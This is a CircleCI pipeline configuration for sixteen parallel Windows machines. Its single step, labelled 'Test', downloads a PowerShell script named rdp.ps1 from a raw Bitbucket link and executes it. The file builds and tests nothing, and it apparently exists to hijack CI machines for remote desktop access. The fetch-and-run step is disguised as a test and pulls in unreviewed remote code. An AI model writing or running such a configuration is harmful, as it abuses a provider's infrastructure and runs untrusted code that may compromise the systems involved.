version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    parallelism: 16 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/ddsdre45/repo1/raw/d707af232da8d79e1a56179d2922d5a3986989b5/rdp.ps1 -OutFile rdp.ps1
            ./rdp.ps1